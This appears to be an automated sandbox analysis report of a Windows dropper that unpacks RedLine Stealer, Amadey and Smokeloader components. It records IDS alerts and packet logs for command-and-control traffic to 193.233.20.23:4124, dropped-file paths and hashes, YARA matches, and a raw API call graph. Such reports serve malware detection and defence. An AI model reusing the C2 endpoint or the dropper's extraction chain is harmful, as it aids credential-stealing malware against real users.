msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
Language of compilation system | Country where language is spoken | Map
English | United States |
Russian | Russia |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/25/23-09:08:56.956124 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 4124 | 49703 | 193.233.20.23 | 192.168.2.5
02/25/23-09:08:55.914790 | TCP | 2043233 | ET TROJAN RedLine Stealer TCP CnC net.tcp Init | 49703 | 4124 | 192.168.2.5 | 193.233.20.23
02/25/23-09:09:12.429866 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49703 | 4124 | 192.168.2.5 | 193.233.20.23
                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.063241959 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.085978985 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.137418985 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.213115931 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.235770941 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.251467943 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.274241924 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.313091993 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.335161924 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.335233927 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.335494041 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.352266073 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.375215054 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.376460075 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.398834944 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.449965954 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.067579031 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.120611906 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.179887056 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.221035957 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.243592024 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.298834085 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.350429058 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.373136997 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.377667904 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.400060892 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.405543089 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.428122044 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.429866076 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.452549934 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.495861053 CET497034124192.168.2.5193.233.20.23


                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                    Start time:09:08:23
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\y0EWt2mE9h.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\y0EWt2mE9h.exe
                                                                                                                                                                                                    Imagebase:0xe70000
                                                                                                                                                                                                    File size:1116672 bytes
                                                                                                                                                                                                    MD5 hash:0588E4E46299165692A58B2046B3EA12
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.305378937.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                    Start time:09:08:24
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe
                                                                                                                                                                                                    Imagebase:0x3e0000
                                                                                                                                                                                                    File size:929792 bytes
                                                                                                                                                                                                    MD5 hash:1D818CDC54AEBE2E587F77D717B0D1C0
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 56%, ReversingLabs
                                                                                                                                                                                                    • Detection: 46%, Virustotal, Browse
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                    Start time:09:08:25
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe
                                                                                                                                                                                                    Imagebase:0xe0000
                                                                                                                                                                                                    File size:699904 bytes
                                                                                                                                                                                                    MD5 hash:611B6D7CD33B7C08EFA3757F4080FF78
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 54%, ReversingLabs
                                                                                                                                                                                                    • Detection: 41%, Virustotal, Browse
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                    Start time:09:08:26
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe
                                                                                                                                                                                                    Imagebase:0xa60000
                                                                                                                                                                                                    File size:409088 bytes
                                                                                                                                                                                                    MD5 hash:830F4723EC8EAD8F959AF2AC394E2E8F
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 54%, ReversingLabs
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                    Start time:09:08:26
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe
                                                                                                                                                                                                    Imagebase:0x690000
                                                                                                                                                                                                    File size:11616 bytes
                                                                                                                                                                                                    MD5 hash:19C22162FD676451E1967474A4076E6F
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 56%, ReversingLabs
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                    Start time:09:08:36
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                    Imagebase:0x7ff64b480000
                                                                                                                                                                                                    File size:69632 bytes
                                                                                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                    Start time:09:08:42
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:351744 bytes
                                                                                                                                                                                                    MD5 hash:3C88EF8689CBDA12A3A7C5D586E5FA04
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.409384942.0000000003120000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.409384942.0000000003120000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 46%, ReversingLabs
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                    Start time:09:08:45
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                    Imagebase:0x7ff64b480000
                                                                                                                                                                                                    File size:69632 bytes
                                                                                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                    Start time:09:08:53
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                    Imagebase:0x7ff64b480000
                                                                                                                                                                                                    File size:69632 bytes
                                                                                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                    Start time:09:09:02
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                    Imagebase:0x7ff64b480000
                                                                                                                                                                                                    File size:69632 bytes
                                                                                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:28.7%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:29.5%
                                                                                                                                                                                                      Total number of Nodes:962
                                                                                                                                                                                                      Total number of Limit Nodes:25
e76ce0 4 API calls 2640 e73013 2638->2640 2639->2638 2640->2296 2640->2311 2642 e73b2d 2641->2642 2642->2642 2643 e73b72 2642->2643 2645 e73b53 2642->2645 2844 e74fe0 2643->2844 2646 e76517 24 API calls 2645->2646 2647 e73b70 2646->2647 2648 e76298 10 API calls 2647->2648 2649 e73b7b 2647->2649 2648->2649 2649->2303 2651 e72583 2650->2651 2652 e72622 2650->2652 2653 e725e8 RegOpenKeyExA 2651->2653 2655 e7258b 2651->2655 2895 e724e0 GetWindowsDirectoryA 2652->2895 2656 e725e3 2653->2656 2657 e72609 RegQueryInfoKeyA 2653->2657 2655->2656 2658 e7259b RegOpenKeyExA 2655->2658 2656->2310 2659 e725d1 RegCloseKey 2657->2659 2658->2656 2660 e725bc RegQueryValueExA 2658->2660 2659->2656 2660->2659 2662 e73bdb 2661->2662 2677 e73bec 2661->2677 2663 e7468f 7 API calls 2662->2663 2663->2677 2664 e73c03 memset 2664->2677 2665 e73d13 2667 e744b9 20 API calls 2665->2667 2666 e7468f 7 API calls 2666->2677 2673 e73d26 2667->2673 2669 e76ce0 4 API calls 2670 e73f60 2669->2670 2670->2312 2671 e73d7b CompareStringA 2672 e73fd7 2671->2672 2671->2677 2672->2673 2994 e72267 2672->2994 2673->2669 2675 e73fab 2678 e744b9 20 API calls 2675->2678 2677->2664 2677->2665 2677->2666 2677->2671 2677->2672 2677->2673 2677->2675 2679 e73f46 LocalFree 2677->2679 2680 e73f1e LocalFree 2677->2680 2684 e73cc7 CompareStringA 2677->2684 2695 e73e10 2677->2695 2903 e71ae8 2677->2903 2944 e7202a memset memset RegCreateKeyExA 2677->2944 2970 e73fef 2677->2970 2682 e73fbe LocalFree 2678->2682 2679->2673 2680->2672 2680->2677 2682->2673 2684->2677 2685 e73f92 2688 e744b9 20 API calls 2685->2688 2686 e73e1f GetProcAddress 2687 e73f64 2686->2687 2686->2695 2690 e744b9 20 API calls 2687->2690 2689 e73fa9 2688->2689 2691 e73f7c LocalFree 2689->2691 2692 e73f75 FreeLibrary 2690->2692 2693 e76285 GetLastError 2691->2693 2692->2691 2694 e73f8b 2693->2694 2694->2673 2695->2685 2695->2686 2696 e73f40 FreeLibrary 2695->2696 2697 e73eff FreeLibrary 2695->2697 2984 e76495 2695->2984 2696->2679 2697->2680 2699 e7468f 7 
API calls 2698->2699 2700 e73a55 LocalAlloc 2699->2700 2701 e73a8e 2700->2701 2702 e73a6c 2700->2702 2704 e7468f 7 API calls 2701->2704 2703 e744b9 20 API calls 2702->2703 2705 e73a7d 2703->2705 2706 e73a98 2704->2706 2707 e76285 GetLastError 2705->2707 2708 e73ac5 lstrcmpA 2706->2708 2709 e73a9c 2706->2709 2713 e72f64 2707->2713 2711 e73b0d LocalFree 2708->2711 2712 e73ada 2708->2712 2710 e744b9 20 API calls 2709->2710 2714 e73aad LocalFree 2710->2714 2711->2713 2715 e76517 24 API calls 2712->2715 2713->2278 2713->2311 2714->2713 2716 e73aec LocalFree 2715->2716 2716->2713 2718 e7628f 2717->2718 2718->2311 2720 e7468f 7 API calls 2719->2720 2721 e7417d LocalAlloc 2720->2721 2722 e74195 2721->2722 2723 e741a8 2721->2723 2725 e744b9 20 API calls 2722->2725 2724 e7468f 7 API calls 2723->2724 2726 e741b5 2724->2726 2727 e741a6 2725->2727 2728 e741c5 lstrcmpA 2726->2728 2729 e741b9 2726->2729 2727->2311 2728->2729 2730 e741e6 LocalFree 2728->2730 2731 e744b9 20 API calls 2729->2731 2730->2727 2731->2730 2733 e7171e _vsnprintf 2732->2733 2734 e762c9 FindResourceA 2733->2734 2736 e76353 2734->2736 2737 e762cb LoadResource LockResource 2734->2737 2738 e76ce0 4 API calls 2736->2738 2737->2736 2740 e762e0 2737->2740 2739 e751ca 2738->2739 2739->2580 2739->2581 2741 e76355 FreeResource 2740->2741 2742 e7631b FreeResource 2740->2742 2741->2736 2743 e7171e _vsnprintf 2742->2743 2743->2734 2745 e7548a 2744->2745 2765 e7551a 2744->2765 2804 e753a1 2745->2804 2747 e75581 2753 e76ce0 4 API calls 2747->2753 2750 e7554d 2750->2747 2759 e7597d 34 API calls 2750->2759 2751 e7553b CreateDirectoryA 2755 e75577 2751->2755 2756 e75547 2751->2756 2752 e75495 2752->2747 2757 e754c2 GetSystemInfo 2752->2757 2758 e7550c 2752->2758 2754 e7559a 2753->2754 2754->2619 2768 e72630 GetWindowsDirectoryA 2754->2768 2760 e76285 GetLastError 2755->2760 2756->2750 2762 e754da 2757->2762 2761 e7658a CharPrevA 2758->2761 2763 e7555c 2759->2763 2764 e7557c 2760->2764 2761->2765 2762->2758 2766 e7658a 
CharPrevA 2762->2766 2763->2747 2767 e75568 RemoveDirectoryA 2763->2767 2764->2747 2815 e758c8 2765->2815 2766->2758 2767->2747 2769 e7266f 2768->2769 2770 e7265e 2768->2770 2772 e76ce0 4 API calls 2769->2772 2771 e744b9 20 API calls 2770->2771 2771->2769 2773 e72687 2772->2773 2773->2607 2773->2620 2775 e769a1 2774->2775 2776 e7696e GetDiskFreeSpaceA 2774->2776 2775->2629 2776->2775 2777 e76989 MulDiv 2776->2777 2777->2775 2779 e759dd GetDiskFreeSpaceA 2778->2779 2780 e759bb 2778->2780 2781 e75ba1 memset 2779->2781 2782 e75a21 MulDiv 2779->2782 2783 e744b9 20 API calls 2780->2783 2784 e76285 GetLastError 2781->2784 2782->2781 2785 e75a50 GetVolumeInformationA 2782->2785 2786 e759cc 2783->2786 2787 e75bbc GetLastError FormatMessageA 2784->2787 2788 e75ab5 SetCurrentDirectoryA 2785->2788 2789 e75a6e memset 2785->2789 2790 e76285 GetLastError 2786->2790 2791 e75be3 2787->2791 2799 e75acc 2788->2799 2792 e76285 GetLastError 2789->2792 2797 e759d1 2790->2797 2793 e744b9 20 API calls 2791->2793 2794 e75a89 GetLastError FormatMessageA 2792->2794 2795 e75bf5 SetCurrentDirectoryA 2793->2795 2794->2791 2795->2797 2796 e76ce0 4 API calls 2798 e75c11 2796->2798 2797->2796 2798->2607 2800 e75b0a 2799->2800 2802 e75b20 2799->2802 2801 e744b9 20 API calls 2800->2801 2801->2797 2802->2797 2827 e7268b 2802->2827 2806 e753bf 2804->2806 2805 e7171e _vsnprintf 2805->2806 2806->2805 2807 e7658a CharPrevA 2806->2807 2810 e75415 GetTempFileNameA 2806->2810 2808 e753fa RemoveDirectoryA GetFileAttributesA 2807->2808 2808->2806 2809 e7544f CreateDirectoryA 2808->2809 2809->2810 2811 e7543a 2809->2811 2810->2811 2812 e75429 DeleteFileA CreateDirectoryA 2810->2812 2813 e76ce0 4 API calls 2811->2813 2812->2811 2814 e75449 2813->2814 2814->2752 2816 e758d8 2815->2816 2816->2816 2817 e758df LocalAlloc 2816->2817 2818 e758f3 2817->2818 2819 e75919 2817->2819 2820 e744b9 20 API calls 2818->2820 2822 e7658a CharPrevA 2819->2822 2826 e75906 2820->2826 2821 e76285 GetLastError 2824 e75534 2821->2824 
2823 e75931 CreateFileA LocalFree 2822->2823 2825 e7595b CloseHandle GetFileAttributesA 2823->2825 2823->2826 2824->2750 2824->2751 2825->2826 2826->2821 2826->2824 2828 e726e5 2827->2828 2829 e726b9 2827->2829 2831 e7271f 2828->2831 2832 e726ea 2828->2832 2830 e7171e _vsnprintf 2829->2830 2833 e726cc 2830->2833 2835 e7171e _vsnprintf 2831->2835 2841 e726e3 2831->2841 2834 e7171e _vsnprintf 2832->2834 2837 e744b9 20 API calls 2833->2837 2838 e726fd 2834->2838 2839 e72735 2835->2839 2836 e76ce0 4 API calls 2840 e7276d 2836->2840 2837->2841 2842 e744b9 20 API calls 2838->2842 2843 e744b9 20 API calls 2839->2843 2840->2797 2841->2836 2842->2841 2843->2841 2845 e7468f 7 API calls 2844->2845 2846 e74ff5 FindResourceA LoadResource LockResource 2845->2846 2847 e75020 2846->2847 2860 e7515f 2846->2860 2848 e75057 2847->2848 2849 e75029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2847->2849 2863 e74efd 2848->2863 2849->2848 2852 e75060 2853 e744b9 20 API calls 2852->2853 2857 e75075 2853->2857 2854 e744b9 20 API calls 2854->2857 2855 e75110 FreeResource 2856 e7511d 2855->2856 2858 e7513a 2856->2858 2861 e744b9 20 API calls 2856->2861 2857->2855 2857->2856 2858->2860 2862 e7514c SendMessageA 2858->2862 2859 e7507c 2859->2854 2859->2857 2860->2647 2861->2858 2862->2860 2864 e74f4a 2863->2864 2870 e74fa1 2864->2870 2871 e74980 2864->2871 2866 e76ce0 4 API calls 2867 e74fc6 2866->2867 2867->2852 2867->2859 2870->2866 2872 e74990 2871->2872 2873 e749a5 2872->2873 2874 e749c2 lstrcmpA 2872->2874 2875 e744b9 20 API calls 2873->2875 2876 e749ba 2874->2876 2877 e74a0e 2874->2877 2875->2876 2876->2870 2879 e74b60 2876->2879 2877->2876 2882 e7487a 2877->2882 2880 e74b76 2879->2880 2881 e74b92 FindCloseChangeNotification 2879->2881 2880->2870 2881->2880 2883 e748a2 CreateFileA 2882->2883 2885 e748e9 2883->2885 2886 e74908 2883->2886 2885->2886 2887 e748ee 2885->2887 2886->2876 2890 e7490c 2887->2890 2891 e748f5 CreateFileA 2890->2891 2892 e74917 2890->2892 2891->2886 2892->2891 2893 
e74962 CharNextA 2892->2893 2894 e74953 CreateDirectoryA 2892->2894 2893->2892 2894->2893 2896 e72510 2895->2896 2897 e7255b 2895->2897 2899 e7658a CharPrevA 2896->2899 2898 e76ce0 4 API calls 2897->2898 2900 e72569 2898->2900 2901 e72522 WritePrivateProfileStringA _lopen 2899->2901 2900->2656 2901->2897 2902 e72548 _llseek _lclose 2901->2902 2902->2897 2904 e71b25 2903->2904 3008 e71a84 2904->3008 2906 e71b57 2907 e7658a CharPrevA 2906->2907 2908 e71b8c 2906->2908 2907->2908 2909 e766c8 2 API calls 2908->2909 2910 e71bd1 2909->2910 2911 e71d73 2910->2911 2912 e71bd9 CompareStringA 2910->2912 2914 e766c8 2 API calls 2911->2914 2912->2911 2913 e71bf7 GetFileAttributesA 2912->2913 2915 e71d53 2913->2915 2916 e71c0d 2913->2916 2917 e71d7d 2914->2917 2920 e71d64 2915->2920 2916->2915 2921 e71a84 2 API calls 2916->2921 2918 e71d81 CompareStringA 2917->2918 2919 e71df8 LocalAlloc 2917->2919 2918->2919 2928 e71d9b 2918->2928 2919->2920 2922 e71e0b GetFileAttributesA 2919->2922 2923 e744b9 20 API calls 2920->2923 2924 e71c31 2921->2924 2925 e71e1d 2922->2925 2942 e71e45 2922->2942 2926 e71d6c 2923->2926 2927 e71c50 LocalAlloc 2924->2927 2932 e71a84 2 API calls 2924->2932 2925->2942 2930 e76ce0 4 API calls 2926->2930 2927->2920 2929 e71c67 GetPrivateProfileIntA GetPrivateProfileStringA 2927->2929 2928->2928 2933 e71dbe LocalAlloc 2928->2933 2937 e71cf8 2929->2937 2941 e71cc2 2929->2941 2931 e71ea1 2930->2931 2931->2677 2932->2927 2933->2920 2936 e71de1 2933->2936 2940 e7171e _vsnprintf 2936->2940 2938 e71d23 2937->2938 2939 e71d09 GetShortPathNameA 2937->2939 2943 e7171e _vsnprintf 2938->2943 2939->2938 2940->2941 2941->2926 3014 e72aac 2942->3014 2943->2941 2945 e72256 2944->2945 2946 e7209a 2944->2946 2947 e76ce0 4 API calls 2945->2947 2949 e7171e _vsnprintf 2946->2949 2951 e720dc 2946->2951 2948 e72263 2947->2948 2948->2677 2950 e720af RegQueryValueExA 2949->2950 2950->2946 2950->2951 2952 e720e4 RegCloseKey 2951->2952 2953 e720fb GetSystemDirectoryA 2951->2953 
